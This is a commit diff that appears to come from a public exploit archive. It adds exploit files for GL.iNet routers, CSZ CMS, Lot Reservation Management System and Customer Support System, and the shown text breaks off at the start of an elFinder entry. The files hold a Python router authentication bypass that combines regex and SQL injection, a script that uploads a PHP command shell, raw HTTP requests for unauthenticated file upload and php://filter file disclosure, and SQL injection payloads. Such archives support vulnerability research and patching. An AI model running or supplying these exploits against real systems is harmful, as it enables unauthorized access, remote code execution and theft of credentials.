DB: 2024-03-07
8 changes to exploits/shellcodes/ghdb GLiNet - Router Authentication Bypass CSZ CMS Version 1.3.0 - Authenticated Remote Command Execution CVE-2023-50071 - Multiple SQL Injection elFinder Web file manager Version - 2.1.53 Remote Command Execution Lot Reservation Management System - Unauthenticated File Disclosure Lot Reservation Management System - Unauthenticated File Upload and Remote Code Execution
This commit is contained in:
parent
42e75482b6
commit
7528fc1c5b
8 changed files with 761 additions and 0 deletions
275
exploits/hardware/webapps/51865.py
Executable file
275
exploits/hardware/webapps/51865.py
Executable file
|
@ -0,0 +1,275 @@
|
|||
DZONERZY Security Research
|
||||
|
||||
GLiNet: Router Authentication Bypass
|
||||
|
||||
========================================================================
|
||||
Contents
|
||||
========================================================================
|
||||
|
||||
1. Overview
|
||||
2. Detailed Description
|
||||
3. Exploit
|
||||
4. Timeline
|
||||
|
||||
========================================================================
|
||||
1. Overview
|
||||
========================================================================
|
||||
|
||||
CVE-2023-46453 is a remote authentication bypass vulnerability in the web
|
||||
interface of GLiNet routers running firmware versions 4.x and up. The
|
||||
vulnerability allows an attacker to bypass authentication and gain access
|
||||
to the router's web interface.
|
||||
|
||||
========================================================================
|
||||
2. Detailed Description
|
||||
========================================================================
|
||||
|
||||
The vulnerability is caused by a lack of proper authentication checks in
|
||||
/usr/sbin/gl-ngx-session file. The file is responsible for authenticating
|
||||
users to the web interface. The authentication is in different stages.
|
||||
|
||||
Stage 1:
|
||||
|
||||
During the first stage the user send a request to the challenge rcp
|
||||
endpoint. The endpoint returns a random nonce value used later in the
|
||||
authentication process.
|
||||
|
||||
Stage 2:
|
||||
|
||||
During the second stage the user sends a request to the login rcp endpoint
|
||||
with the username and the encrypted password. The encrypted password is
|
||||
calculated by the following formula:
|
||||
|
||||
md5(username + crypt(password) + nonce)
|
||||
|
||||
The crypt function is the standard unix crypt function.
|
||||
|
||||
The vulnerability lies in the fact that the username is not sanitized
|
||||
properly before being passed to the login_test function in the lua script.
|
||||
|
||||
------------------------------------------------------------------------
|
||||
local function login_test(username, hash)
|
||||
if not username or username == "" then return false end
|
||||
|
||||
for l in io.lines("/etc/shadow") do
|
||||
local pw = l:match('^' .. username .. ':([^:]+)')
|
||||
if pw then
|
||||
for nonce in pairs(nonces) do
|
||||
if utils.md5(table.concat({username, pw, nonce}, ":")) ==
|
||||
hash then
|
||||
nonces[nonce] = nil
|
||||
nonce_cnt = nonce_cnt - 1
|
||||
return true
|
||||
end
|
||||
end
|
||||
return false
|
||||
end
|
||||
end
|
||||
|
||||
return false
|
||||
end
|
||||
------------------------------------------------------------------------
|
||||
|
||||
This script check the username against the /etc/shadow file. If the username
|
||||
is found in the file the script will extract the password hash and compare
|
||||
it to the hash sent by the user. If the hashes match the user is
|
||||
authenticated.
|
||||
|
||||
The issue is that the username is not sanitized properly before being
|
||||
concatenated with the regex. This allows an attacker to inject a regex into
|
||||
the username field and modify the final behavior of the regex.
|
||||
|
||||
for instance, the following username will match the userid of the root user:
|
||||
|
||||
root:[^:]+:[^:]+ will become root:[^:]+:[^:]+:([^:]+)
|
||||
|
||||
|
||||
This will match the "root:" string and then any character until the next ":"
|
||||
character. This will cause the script skip the password and return the
|
||||
user id instead.
|
||||
|
||||
Since the user id of the root user is always 0, the script will always
|
||||
return:
|
||||
|
||||
md5("root:[^:]+:[^:]+" + "0" + nonce)
|
||||
|
||||
Since this value is always the same, the attacker can simply send the known
|
||||
hash value to the login rcp endpoint and gain access to the web interface.
|
||||
|
||||
Anyway this approach won't work as expected since later in the code inside
|
||||
the
|
||||
this check appear:
|
||||
|
||||
------------------------------------------------------------------------
|
||||
local aclgroup = db.get_acl_by_username(username)
|
||||
|
||||
local sid = utils.generate_id(32)
|
||||
|
||||
sessions[sid] = {
|
||||
username = username,
|
||||
aclgroup = aclgroup,
|
||||
timeout = time_now() + session_timeout
|
||||
}
|
||||
------------------------------------------------------------------------
|
||||
|
||||
The username which is now our custom regex will be passed to the
|
||||
get_acl_by_username
|
||||
function. This function will check the username against a database and
|
||||
return the aclgroup associated with the username.
|
||||
If the username is not found in the database the function will return nil,
|
||||
thus causing attack to fail.
|
||||
|
||||
By checking the code we can see that the get_acl_by_username function is
|
||||
actually appending our raw string to a query and then executing it.
|
||||
This means that we can inject a sql query into the username field and
|
||||
make it return a valid aclgroup.
|
||||
|
||||
------------------------------------------------------------------------
|
||||
M.get_acl_by_username = function(username)
|
||||
if username == "root" then return "root" end
|
||||
|
||||
local db = sqlite3.open(DB)
|
||||
local sql = string.format("SELECT acl FROM account WHERE username =
|
||||
'%s'", username)
|
||||
|
||||
local aclgroup = ""
|
||||
|
||||
for a in db:rows(sql) do
|
||||
aclgroup = a[1]
|
||||
end
|
||||
|
||||
db:close()
|
||||
|
||||
return aclgroup
|
||||
end
|
||||
------------------------------------------------------------------------
|
||||
|
||||
Using this payload we were able to craft a username which is both a valid
|
||||
regex and a valid sql query:
|
||||
|
||||
roo[^'union selecT char(114,111,111,116)--]:[^:]+:[^:]+
|
||||
|
||||
this will make the sql query become:
|
||||
|
||||
SELECT acl FROM account WHERE username = 'roo[^'union selecT
|
||||
char(114,111,111,116)--]:[^:]+:[^:]+'
|
||||
|
||||
which will return the aclgroup of the root user (root).
|
||||
|
||||
========================================================================
|
||||
3. Exploit
|
||||
========================================================================
|
||||
|
||||
------------------------------------------------------------------------
|
||||
# Exploit Title: [CVE-2023-46453] GL.iNet - Authentication Bypass
|
||||
# Date: 18/10/2023
|
||||
# Exploit Author: Daniele 'dzonerzy' Linguaglossa
|
||||
# Vendor Homepage: https://www.gl-inet.com/
|
||||
# Vulnerable Devices:
|
||||
# GL.iNet GL-MT3000 (4.3.7)
|
||||
# GL.iNet GL-AR300M(4.3.7)
|
||||
# GL.iNet GL-B1300 (4.3.7)
|
||||
# GL.iNet GL-AX1800 (4.3.7)
|
||||
# GL.iNet GL-AR750S (4.3.7)
|
||||
# GL.iNet GL-MT2500 (4.3.7)
|
||||
# GL.iNet GL-AXT1800 (4.3.7)
|
||||
# GL.iNet GL-X3000 (4.3.7)
|
||||
# GL.iNet GL-SFT1200 (4.3.7)
|
||||
# And many more...
|
||||
# Version: 4.3.7
|
||||
# Firmware Release Date: 2023/09/13
|
||||
# CVE: CVE-2023-46453
|
||||
|
||||
from urllib.parse import urlparse
|
||||
import requests
|
||||
import hashlib
|
||||
import random
|
||||
import sys
|
||||
|
||||
|
||||
def exploit(url):
|
||||
try:
|
||||
requests.packages.urllib3.disable_warnings()
|
||||
host = urlparse(url)
|
||||
url = f"{host.scheme}://{host.netloc}/rpc"
|
||||
print(f"[*] Target: {url}")
|
||||
print("[*] Retrieving nonce...")
|
||||
nonce = requests.post(url, verify=False, json={
|
||||
"jsonrpc": "2.0",
|
||||
"id": random.randint(1000, 9999),
|
||||
"method": "challenge",
|
||||
"params": {"username": "root"}
|
||||
}, timeout=5).json()
|
||||
if "result" in nonce and "nonce" in nonce["result"]:
|
||||
print(f"[*] Got nonce: {nonce['result']['nonce']} !")
|
||||
else:
|
||||
print("[!] Nonce not found, exiting... :(")
|
||||
sys.exit(1)
|
||||
print("[*] Retrieving authentication token for root...")
|
||||
md5_hash = hashlib.md5()
|
||||
md5_hash.update(
|
||||
f"roo[^'union selecT
|
||||
char(114,111,111,116)--]:[^:]+:[^:]+:0:{nonce['result']['nonce']}".encode())
|
||||
password = md5_hash.hexdigest()
|
||||
token = requests.post(url, verify=False, json={
|
||||
"jsonrpc": "2.0",
|
||||
"id": random.randint(1000, 9999),
|
||||
"method": "login",
|
||||
"params": {
|
||||
"username": f"roo[^'union selecT
|
||||
char(114,111,111,116)--]:[^:]+:[^:]+",
|
||||
"hash": password
|
||||
}
|
||||
}, timeout=5).json()
|
||||
if "result" in token and "sid" in token["result"]:
|
||||
print(f"[*] Got token: {token['result']['sid']} !")
|
||||
else:
|
||||
print("[!] Token not found, exiting... :(")
|
||||
sys.exit(1)
|
||||
print("[*] Checking if we are root...")
|
||||
check = requests.post(url, verify=False, json={
|
||||
"jsonrpc": "2.0",
|
||||
"id": random.randint(1000, 9999),
|
||||
"method": "call",
|
||||
"params": [token["result"]["sid"], "system", "get_status", {}]
|
||||
}, timeout=5).json()
|
||||
if "result" in check and "wifi" in check["result"]:
|
||||
print("[*] We are authenticated as root! :)")
|
||||
print("[*] Below some info:")
|
||||
for wifi in check["result"]["wifi"]:
|
||||
print(f"[*] --------------------")
|
||||
print(f"[*] SSID: {wifi['ssid']}")
|
||||
print(f"[*] Password: {wifi['passwd']}")
|
||||
print(f"[*] Band: {wifi['band']}")
|
||||
print(f"[*] --------------------")
|
||||
else:
|
||||
print("[!] Something went wrong, exiting... :(")
|
||||
sys.exit(1)
|
||||
except requests.exceptions.Timeout:
|
||||
print("[!] Timeout error, exiting... :(")
|
||||
sys.exit(1)
|
||||
except KeyboardInterrupt:
|
||||
print(f"[!] Something went wrong: {e}")
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
print("GL.iNet Auth Bypass\n")
|
||||
if len(sys.argv) < 2:
|
||||
print(
|
||||
f"Usage: python3 {sys.argv[1]} https://target.com",
|
||||
file=sys.stderr)
|
||||
sys.exit(0)
|
||||
else:
|
||||
exploit(sys.argv[1])
|
||||
------------------------------------------------------------------------
|
||||
|
||||
========================================================================
|
||||
4. Timeline
|
||||
========================================================================
|
||||
|
||||
2023/09/13 - Vulnerability discovered
|
||||
2023/09/14 - CVE-2023-46453 requested
|
||||
2023/09/20 - Vendor contacted
|
||||
2023/09/20 - Vendor replied
|
||||
2023/09/30 - CVE-2023-46453 assigned
|
||||
2023/11/08 - Vulnerability patched and fix released
|
67
exploits/php/webapps/51860.txt
Normal file
67
exploits/php/webapps/51860.txt
Normal file
|
@ -0,0 +1,67 @@
|
|||
# Exploit Title: Lot Reservation Management System Unauthenticated File Upload and Remote Code Execution
|
||||
# Google Dork: N/A
|
||||
# Date: 10th December 2023
|
||||
# Exploit Author: Elijah Mandila Syoyi
|
||||
# Vendor Homepage: https://www.sourcecodester.com/php/14530/lot-reservation-management-system-using-phpmysqli-source-code.html
|
||||
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/lot-reservation-management-system.zip
|
||||
# Version: 1.0
|
||||
# Tested on: Microsoft Windows 11 Enterprise and XAMPP 3.3.0
|
||||
# CVE : N/A
|
||||
|
||||
Developer description about application purpose:-
|
||||
|
||||
------------------------------------------------------------------------------------------------------------------------------------------------------------------
|
||||
About
|
||||
|
||||
The Lot Reservation Management System is a simple PHP/MySQLi project that will help a certain subdivision, condo, or any business that selling a land property or house and lot. The system will help the said industry or company to provide their possible client information about the property they are selling and at the same time, possible clients can reserve their desired property. The lot reservation system website for the clients has user-friendly functions and the contents that are displayed can be managed dynamically by the management. This system allows management to upload the area map, and by this feature, the system admin or staff will populate the list of lots, house models, or the property that they are selling to allow the possible client to choose the area they want. The map will be divided into each division of the property of building like Phase 1-5 of a certain Subdivision, each of these phases will be encoded individually in the system along with the map image showing the division of each property or lots.
|
||||
|
||||
------------------------------------------------------------------------------------------------------------------------------------------------------------------
|
||||
|
||||
|
||||
Vulnerability:-
|
||||
|
||||
The application does not properly verify authentication information and file types before files upload. This can allow an attacker to bypass authentication and file checking and upload malicious file to the server. There is an open directory listing where uploaded files are stored, allowing an attacker to open the malicious file in PHP, and will be executed by the server.
|
||||
|
||||
|
||||
|
||||
Proof of Concept:-
|
||||
|
||||
(HTTP POST Request)
|
||||
|
||||
POST /lot/admin/ajax.php?action=save_division HTTP/1.1
|
||||
Host: 192.168.150.228
|
||||
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
|
||||
Accept: */*
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
X-Requested-With: XMLHttpRequest
|
||||
Content-Type: multipart/form-data; boundary=---------------------------217984066236596965684247013027
|
||||
Content-Length: 606
|
||||
Origin: http://192.168.150.228
|
||||
Connection: close
|
||||
Referer: http://192.168.150.228/lot/admin/index.php?page=divisions
|
||||
|
||||
|
||||
-----------------------------217984066236596965684247013027
|
||||
Content-Disposition: form-data; name="id"
|
||||
|
||||
|
||||
-----------------------------217984066236596965684247013027
|
||||
Content-Disposition: form-data; name="name"
|
||||
|
||||
sample
|
||||
-----------------------------217984066236596965684247013027
|
||||
Content-Disposition: form-data; name="description"
|
||||
|
||||
sample
|
||||
-----------------------------217984066236596965684247013027
|
||||
Content-Disposition: form-data; name="img"; filename="phpinfo.php"
|
||||
Content-Type: application/x-php
|
||||
|
||||
<?php phpinfo() ?>
|
||||
|
||||
-----------------------------217984066236596965684247013027--
|
||||
|
||||
|
||||
|
||||
Check your uploaded file/shell in "http://192.168.150.228/lot/admin/assets/uploads/maps/". Replace the IP Addresses with the victim IP address.
|
75
exploits/php/webapps/51861.txt
Normal file
75
exploits/php/webapps/51861.txt
Normal file
|
@ -0,0 +1,75 @@
|
|||
# Exploit Title: Lot Reservation Management System Unauthenticated File Disclosure Vulnerability
|
||||
# Google Dork: N/A
|
||||
# Date: 10th December 2023
|
||||
# Exploit Author: Elijah Mandila Syoyi
|
||||
# Vendor Homepage: https://www.sourcecodester.com/php/14530/lot-reservation-management-system-using-phpmysqli-source-code.html
|
||||
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/lot-reservation-management-system.zip
|
||||
# Version: 1.0
|
||||
# Tested on: Microsoft Windows 11 Enterprise and XAMPP 3.3.0
|
||||
# CVE : N/A
|
||||
|
||||
Developer description about application purpose:-
|
||||
|
||||
------------------------------------------------------------------------------------------------------------------------------------------------------------------
|
||||
About
|
||||
|
||||
The Lot Reservation Management System is a simple PHP/MySQLi project that will help a certain subdivision, condo, or any business that selling a land property or house and lot. The system will help the said industry or company to provide their possible client information about the property they are selling and at the same time, possible clients can reserve their desired property. The lot reservation system website for the clients has user-friendly functions and the contents that are displayed can be managed dynamically by the management. This system allows management to upload the area map, and by this feature, the system admin or staff will populate the list of lots, house models, or the property that they are selling to allow the possible client to choose the area they want. The map will be divided into each division of the property of building like Phase 1-5 of a certain Subdivision, each of these phases will be encoded individually in the system along with the map image showing the division of each property or lots.
|
||||
|
||||
------------------------------------------------------------------------------------------------------------------------------------------------------------------
|
||||
|
||||
|
||||
Vulnerability:-
|
||||
|
||||
The application is vulnerable to PHP source code disclosure vulnerability. This can be abused by an attacker to disclose sensitive PHP files within the application and also outside the server root. PHP conversion to base64 filter will be used in this scenario.
|
||||
|
||||
|
||||
|
||||
Proof of Concept:-
|
||||
|
||||
(HTTP POST Request)
|
||||
|
||||
GET /lot/index.php?page=php://filter/convert.base64-encode/resource=admin/db_connect HTTP/1.1
|
||||
Host: 192.168.150.228
|
||||
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
Connection: close
|
||||
Referer: http://192.168.150.228/lot/
|
||||
Cookie: PHPSESSID=o59sqrufi4171o8bkbmf1aq9sn
|
||||
Upgrade-Insecure-Requests: 1
|
||||
|
||||
|
||||
The same can be achieved by removing the PHPSESSID cookie as below:-
|
||||
|
||||
|
||||
GET /lot/index.php?page=php://filter/convert.base64-encode/resource=admin/db_connect HTTP/1.1
|
||||
Host: 192.168.150.228
|
||||
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
Connection: close
|
||||
Referer: http://192.168.150.228/lot/
|
||||
Upgrade-Insecure-Requests: 1
|
||||
|
||||
|
||||
|
||||
The file requested will be returned in base64 format in returned HTTP response.
|
||||
|
||||
The attack can also be used to traverse directories to return files outside the web root.
|
||||
|
||||
|
||||
|
||||
GET /lot/index.php?page=php://filter/convert.base64-encode/resource=D:\test HTTP/1.1
|
||||
Host: 192.168.150.228
|
||||
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
Connection: close
|
||||
Referer: http://192.168.150.228/lot/
|
||||
Upgrade-Insecure-Requests: 1
|
||||
|
||||
|
||||
This will return test.php file in the D:\ directory.
|
69
exploits/php/webapps/51862.txt
Normal file
69
exploits/php/webapps/51862.txt
Normal file
|
@ -0,0 +1,69 @@
|
|||
# Exploit Title: Customer Support System 1.0 - Multiple SQL injection
|
||||
vulnerabilities
|
||||
# Date: 15/12/2023
|
||||
# Exploit Author: Geraldo Alcantara
|
||||
# Vendor Homepage:
|
||||
https://www.sourcecodester.com/php/14587/customer-support-system-using-phpmysqli-source-code.html
|
||||
# Software Link:
|
||||
https://www.sourcecodester.com/download-code?nid=14587&title=Customer+Support+System+using+PHP%2FMySQLi+with+Source+Code
|
||||
# Version: 1.0
|
||||
# Tested on: Windows
|
||||
# CVE : CVE-2023-50071
|
||||
*Description*: Multiple SQL injection vulnerabilities in
|
||||
/customer_support/ajax.php?action=save_ticket in Customer Support
|
||||
System 1.0 allow authenticated attackers to execute arbitrary SQL
|
||||
commands via department_id, customer_id and subject.*Payload*:
|
||||
'+(select*from(select(sleep(20)))a)+'
|
||||
*Steps to reproduce*:
|
||||
|
||||
1- Log in to the application.
|
||||
|
||||
2- Navigate to the page /customer_support/index.php?page=new_ticket.
|
||||
|
||||
3- Create a new ticket and insert a malicious payload into one of the
|
||||
following parameters: department_id, customer_id, or subject.
|
||||
*Request:*
|
||||
POST /customer_support/ajax.php?action=save_ticket HTTP/1.1
|
||||
Host: localhost
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0)
|
||||
Gecko/20100101 Firefox/120.0
|
||||
Accept: */*
|
||||
Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
|
||||
Accept-Encoding: gzip, deflate, br
|
||||
X-Requested-With: XMLHttpRequest
|
||||
Content-Type: multipart/form-data;
|
||||
boundary=---------------------------81419250823331111993422505835
|
||||
Content-Length: 853
|
||||
Origin: http://192.168.68.148
|
||||
Connection: close
|
||||
Referer: http://192.168.68.148/customer_support/index.php?page=new_ticket
|
||||
Cookie: csrftoken=1hWW6JE5vLFhJv2y8LwgL3WNPbPJ3J2WAX9F2U0Fd5H5t6DSztkJWD4nWFrbF8ko;
|
||||
sessionid=xrn1sshbol1vipddxsijmgkdp2q4qdgq;
|
||||
PHPSESSID=mfd30tu0h0s43s7kdjb74fcu0l
|
||||
|
||||
-----------------------------81419250823331111993422505835
|
||||
Content-Disposition: form-data; name="id"
|
||||
|
||||
|
||||
-----------------------------81419250823331111993422505835
|
||||
Content-Disposition: form-data; name="subject"
|
||||
|
||||
teste'+(select*from(select(sleep(5)))a)+'
|
||||
-----------------------------81419250823331111993422505835
|
||||
Content-Disposition: form-data; name="customer_id"
|
||||
|
||||
3
|
||||
-----------------------------81419250823331111993422505835
|
||||
Content-Disposition: form-data; name="department_id"
|
||||
|
||||
4
|
||||
-----------------------------81419250823331111993422505835
|
||||
Content-Disposition: form-data; name="description"
|
||||
|
||||
<p>Blahs<br></p>
|
||||
-----------------------------81419250823331111993422505835
|
||||
Content-Disposition: form-data; name="files"; filename=""
|
||||
Content-Type: application/octet-stream
|
||||
|
||||
|
||||
-----------------------------81419250823331111993422505835--
|
229
exploits/php/webapps/51863.py
Executable file
229
exploits/php/webapps/51863.py
Executable file
|
@ -0,0 +1,229 @@
|
|||
# Exploit Title: CSZ CMS Version 1.3.0 Remote Command Execution
|
||||
# Date: 17/11/2023
|
||||
# Exploit Author: tmrswrr
|
||||
# Vendor Homepage: https://www.cszcms.com/
|
||||
# Software Link: https://www.cszcms.com/link/3#https://sourceforge.net/projects/cszcms/files/latest/download
|
||||
# Version: Version 1.3.0
|
||||
# Tested on: https://www.softaculous.com/apps/cms/CSZ_CMS
|
||||
|
||||
|
||||
import os
|
||||
import zipfile
|
||||
from selenium import webdriver
|
||||
from selenium.webdriver.common.by import By
|
||||
from selenium.webdriver.firefox.options import Options as FirefoxOptions
|
||||
from selenium.webdriver.firefox.service import Service as FirefoxService
|
||||
from webdriver_manager.firefox import GeckoDriverManager
|
||||
from selenium.webdriver.support.ui import WebDriverWait
|
||||
from selenium.webdriver.support import expected_conditions as EC
|
||||
from selenium.common.exceptions import NoSuchElementException, TimeoutException
|
||||
import requests
|
||||
from time import sleep
|
||||
import sys
|
||||
import random
|
||||
import time
|
||||
import platform
|
||||
import tarfile
|
||||
from io import BytesIO
|
||||
|
||||
email = "admin@admin.com"
|
||||
password = "password"
|
||||
|
||||
class colors:
|
||||
OKBLUE = '\033[94m'
|
||||
WARNING = '\033[93m'
|
||||
FAIL = '\033[91m'
|
||||
ENDC = '\033[0m'
|
||||
BOLD = '\033[1m'
|
||||
UNDERLINE = '\033[4m'
|
||||
CBLACK = '\33[30m'
|
||||
CRED = '\33[31m'
|
||||
CGREEN = '\33[32m'
|
||||
CYELLOW = '\33[33m'
|
||||
CBLUE = '\33[34m'
|
||||
CVIOLET = '\33[35m'
|
||||
CBEIGE = '\33[36m'
|
||||
CWHITE = '\33[37m'
|
||||
|
||||
|
||||
color_random = [colors.CBLUE, colors.CVIOLET, colors.CWHITE, colors.OKBLUE, colors.CGREEN, colors.WARNING,
|
||||
colors.CRED, colors.CBEIGE]
|
||||
random.shuffle(color_random)
|
||||
|
||||
|
||||
def entryy():
|
||||
x = color_random[0] + """
|
||||
|
||||
╭━━━┳━━━┳━━━━╮╭━━━┳━╮╭━┳━━━╮╭━━━┳━━━┳━━━╮╭━━━┳━╮╭━┳━━━┳╮╱╱╭━━━┳━━┳━━━━╮
|
||||
┃╭━╮┃╭━╮┣━━╮━┃┃╭━╮┃┃╰╯┃┃╭━╮┃┃╭━╮┃╭━╮┃╭━━╯┃╭━━┻╮╰╯╭┫╭━╮┃┃╱╱┃╭━╮┣┫┣┫╭╮╭╮┃
|
||||
┃┃╱╰┫╰━━╮╱╭╯╭╯┃┃╱╰┫╭╮╭╮┃╰━━╮┃╰━╯┃┃╱╰┫╰━━╮┃╰━━╮╰╮╭╯┃╰━╯┃┃╱╱┃┃╱┃┃┃┃╰╯┃┃╰╯
|
||||
┃┃╱╭╋━━╮┃╭╯╭╯╱┃┃╱╭┫┃┃┃┃┣━━╮┃┃╭╮╭┫┃╱╭┫╭━━╯┃╭━━╯╭╯╰╮┃╭━━┫┃╱╭┫┃╱┃┃┃┃╱╱┃┃
|
||||
┃╰━╯┃╰━╯┣╯━╰━╮┃╰━╯┃┃┃┃┃┃╰━╯┃┃┃┃╰┫╰━╯┃╰━━╮┃╰━━┳╯╭╮╰┫┃╱╱┃╰━╯┃╰━╯┣┫┣╮╱┃┃
|
||||
╰━━━┻━━━┻━━━━╯╰━━━┻╯╰╯╰┻━━━╯╰╯╰━┻━━━┻━━━╯╰━━━┻━╯╰━┻╯╱╱╰━━━┻━━━┻━━╯╱╰╯
|
||||
|
||||
<< CSZ CMS Version 1.3.0 RCE >>
|
||||
<< CODED BY TMRSWRR >>
|
||||
<< GITHUB==>capture0x >>
|
||||
|
||||
\n"""
|
||||
for c in x:
|
||||
print(c, end='')
|
||||
sys.stdout.flush()
|
||||
sleep(0.0045)
|
||||
oo = " " * 6 + 29 * "░⣿" + "\n\n"
|
||||
for c in oo:
|
||||
print(colors.CGREEN + c, end='')
|
||||
sys.stdout.flush()
|
||||
sleep(0.0065)
|
||||
|
||||
tt = " " * 5 + "░⣿" + " " * 6 + "WELCOME TO CSZ CMS Version 1.3.0 RCE Exploit" + " " * 7 + "░⣿" + "\n\n"
|
||||
for c in tt:
|
||||
print(colors.CWHITE + c, end='')
|
||||
sys.stdout.flush()
|
||||
sleep(0.0065)
|
||||
xx = " " * 6 + 29 * "░⣿" + "\n\n"
|
||||
for c in xx:
|
||||
print(colors.CGREEN + c, end='')
|
||||
sys.stdout.flush()
|
||||
sleep(0.0065)
|
||||
|
||||
def check_geckodriver():
|
||||
current_directory = os.path.dirname(os.path.abspath(__file__))
|
||||
geckodriver_path = os.path.join(current_directory, 'geckodriver')
|
||||
|
||||
if not os.path.isfile(geckodriver_path):
|
||||
red = "\033[91m"
|
||||
reset = "\033[0m"
|
||||
print(red + "\n\nGeckoDriver (geckodriver) is not available in the script's directory." + reset)
|
||||
user_input = input("Would you like to download it now? (yes/no): ").lower()
|
||||
if user_input == 'yes':
|
||||
download_geckodriver(current_directory)
|
||||
else:
|
||||
print(red + "Please download GeckoDriver manually from: https://github.com/mozilla/geckodriver/releases" + reset)
|
||||
sys.exit(1)
|
||||
|
||||
def download_geckodriver(directory):
|
||||
|
||||
print("[*] Detecting OS and architecture...")
|
||||
os_name = platform.system().lower()
|
||||
arch, _ = platform.architecture()
|
||||
|
||||
if os_name == "linux":
|
||||
os_name = "linux"
|
||||
arch = "64" if arch == "64bit" else "32"
|
||||
elif os_name == "darwin":
|
||||
os_name = "macos"
|
||||
arch = "aarch64" if platform.processor() == "arm" else ""
|
||||
elif os_name == "windows":
|
||||
os_name = "win"
|
||||
arch = "64" if arch == "64bit" else "32"
|
||||
else:
|
||||
print("[!] Unsupported operating system.")
|
||||
sys.exit(1)
|
||||
|
||||
geckodriver_version = "v0.33.0"
|
||||
geckodriver_file = f"geckodriver-{geckodriver_version}-{os_name}{arch}"
|
||||
ext = "zip" if os_name == "win" else "tar.gz"
|
||||
url = f"https://github.com/mozilla/geckodriver/releases/download/{geckodriver_version}/{geckodriver_file}.{ext}"
|
||||
|
||||
print(f"[*] Downloading GeckoDriver for {platform.system()} {arch}-bit...")
|
||||
response = requests.get(url, stream=True)
|
||||
|
||||
if response.status_code == 200:
|
||||
print("[*] Extracting GeckoDriver...")
|
||||
if ext == "tar.gz":
|
||||
with tarfile.open(fileobj=BytesIO(response.content), mode="r:gz") as tar:
|
||||
tar.extractall(path=directory)
|
||||
else:
|
||||
with zipfile.ZipFile(BytesIO(response.content)) as zip_ref:
|
||||
zip_ref.extractall(directory)
|
||||
print("[+] GeckoDriver downloaded and extracted successfully.")
|
||||
else:
|
||||
print("[!] Failed to download GeckoDriver.")
|
||||
sys.exit(1)
|
||||
|
||||
def create_zip_file(php_filename, zip_filename, php_code):
|
||||
try:
|
||||
with open(php_filename, 'w') as file:
|
||||
file.write(php_code)
|
||||
with zipfile.ZipFile(zip_filename, 'w') as zipf:
|
||||
zipf.write(php_filename)
|
||||
print("[+] Zip file created successfully.")
|
||||
os.remove(php_filename)
|
||||
return zip_filename
|
||||
except Exception as e:
|
||||
print(f"[!] Error creating zip file: {e}")
|
||||
sys.exit(1)
|
||||
|
||||
|
||||
def main(base_url, command):
|
||||
|
||||
if not base_url.endswith('/'):
|
||||
base_url += '/'
|
||||
|
||||
zip_filename = None
|
||||
|
||||
check_geckodriver()
|
||||
try:
|
||||
firefox_options = FirefoxOptions()
|
||||
firefox_options.add_argument("--headless")
|
||||
|
||||
script_directory = os.path.dirname(os.path.abspath(__file__))
|
||||
geckodriver_path = os.path.join(script_directory, 'geckodriver')
|
||||
service = FirefoxService(executable_path=geckodriver_path)
|
||||
driver = webdriver.Firefox(service=service, options=firefox_options)
|
||||
print("[*] Exploit initiated.")
|
||||
|
||||
# Login
|
||||
driver.get(base_url + "admin/login")
|
||||
print("[*] Accessing login page...")
|
||||
driver.find_element(By.NAME, "email").send_keys(f"{email}")
|
||||
driver.find_element(By.NAME, "password").send_keys(f"{password}")
|
||||
driver.find_element(By.ID, "login_submit").click()
|
||||
print("[*] Credentials submitted...")
|
||||
|
||||
|
||||
try:
|
||||
error_message = driver.find_element(By.XPATH, "//*[contains(text(), 'Email address/Password is incorrect')]")
|
||||
if error_message.is_displayed():
|
||||
print("[!] Login failed: Invalid credentials.")
|
||||
driver.quit()
|
||||
sys.exit(1)
|
||||
except NoSuchElementException:
|
||||
print("[+] Login successful.")
|
||||
|
||||
# File creation
|
||||
print("[*] Preparing exploit files...")
|
||||
php_code = f"<?php echo system('{command}'); ?>"
|
||||
zip_filename = create_zip_file("exploit.php", "payload.zip", php_code)
|
||||
|
||||
|
||||
driver.get(base_url + "admin/upgrade")
|
||||
print("[*] Uploading exploit payload...")
|
||||
file_input = driver.find_element(By.ID, "file_upload")
|
||||
file_input.send_keys(os.path.join(os.getcwd(), zip_filename))
|
||||
|
||||
# Uploading
|
||||
driver.find_element(By.ID, "submit").click()
|
||||
WebDriverWait(driver, 10).until(EC.alert_is_present())
|
||||
alert = driver.switch_to.alert
|
||||
alert.accept()
|
||||
|
||||
# Exploit result
|
||||
exploit_url = base_url + "exploit.php"
|
||||
response = requests.get(exploit_url)
|
||||
print(f"[+] Exploit response:\n\n{response.text}")
|
||||
|
||||
except Exception as e:
|
||||
print(f"[!] Error: {e}")
|
||||
finally:
|
||||
driver.quit()
|
||||
if zip_filename and os.path.exists(zip_filename):
|
||||
os.remove(zip_filename)
|
||||
|
||||
if __name__ == "__main__":
|
||||
entryy()
|
||||
if len(sys.argv) < 3:
|
||||
print("Usage: python script.py [BASE_URL] [COMMAND]")
|
||||
else:
|
||||
main(sys.argv[1], sys.argv[2])
|
17
exploits/php/webapps/51864.txt
Normal file
17
exploits/php/webapps/51864.txt
Normal file
|
@ -0,0 +1,17 @@
|
|||
# Exploit Title: elFinder Web file manager Version: 2.1.53 Remote Command Execution
|
||||
# Date: 23/11/2023
|
||||
